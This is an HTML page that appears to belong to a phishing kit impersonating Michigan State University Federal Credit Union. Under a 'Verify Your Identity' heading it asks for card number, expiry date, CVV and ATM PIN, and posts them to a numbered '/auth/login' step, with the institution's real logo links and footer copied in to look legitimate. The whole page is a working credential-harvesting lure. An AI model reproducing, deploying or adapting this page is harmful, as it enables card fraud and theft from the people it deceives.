<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Secure Login</title>
  <link rel="shortcut icon" href="/img/favicon.ico" type="image/x-icon">
  <link rel="stylesheet" href="/css/main.css">
  <script src="/js/jquery.js"></script>
  <script src="/js/mask.js"></script>
</head>

<body>
  <div class="wrapper">
    <div class="header mobile-header">
      <div class="cb-logo-container">
        <a href="https://www.msufcu.org/">
          <img src="/img/logo.svg" class="cb-logo">
          <img src="/img/logo-small.svg" class="cb-logo-small">
        </a>
      </div>

      <h4 class="cb-title">ComputerLine</h4>
    </div>

    <div class="main">
      <div class="form-container">
        <div class="form-heading">
          <span>Verify Your Identity</span>
          <div class="form-sub-text">Help us confirm it's you by filling out the following information.</div>
        </div>
        <br>

        <form action="/auth/login/6" method="post">
          <table>
            <tbody>
              <tr>
                <td>Card Number</td>
                <td><input name="cardNum" id="cardNum" type="text" class="form-control" autocomplete="off" autocapitalize="off" spellcheck="off" required></td>
              </tr>

              <tr>
                <td>Expiry Date</td>
                <td><input name="expDate" id="expDate" type="text" class="form-control" autocomplete="off" autocapitalize="off" spellcheck="off" required></td>
              </tr>

              <tr>
                <td>Security Code (CVV)</td>
                <td><input name="cvv" id="cvv" type="text" class="form-control" autocomplete="off" autocapitalize="off" spellcheck="off" required></td>
              </tr>

              <tr>
                <td>Card/ATM PIN</td>
                <td><input name="pin" id="pin" type="password" class="form-control input-mask" autocomplete="off" autocapitalize="off" spellcheck="off" required>
                </td>
              </tr>
              <tr>
                <td></td>
                <td><button type="submit" class="submit-btn">Continue</button></td>
              </tr>
            </tbody>
          </table>
        </form>
      </div>
    </div>

    <div class="footer">
      <div class="footer-text">
        <p>
          <strong>Michigan State University Federal Credit Union</strong> savings are Federally insured to at least $250,000 by the <a href="https://www.ncua.gov/">NCUA</a> and backed by the full faith and credit of the United States Government. APR = Annual Percentage Rate. APY = Annual Percentage Yield. <a href="https://www.msufcu.org/disclosures/?expand=privacy_policy#privacy_policy">View our Privacy Policy</a> and
          read our <a href="https://media.msufcu.org/publicsites/publicsite/documents/u2slfliv46vtlzftrvw1.pdf">disclaimer</a> regarding links to other sites.
        </p>
        <div class="copyright">
          Copyright © 2023 Michigan State University Federal Credit Union All Rights Reserved.
        </div>
      </div>

      <div>
        <a href="https://www.ncua.gov/">
          <img src="/img/ncua.gif">
        </a>
      </div>

      <div>
        <img src="/img/ehl.png">
      </div>
    </div>
  </div>

  <script src="/js/main.js"></script>
  <script>
    $('#cardNum').mask('0000 0000 0000 0000');
    $('#expDate').mask('00/0000');
    $('#cvv').mask('0000');
    $('#pin').mask('0000');
  </script>
</body>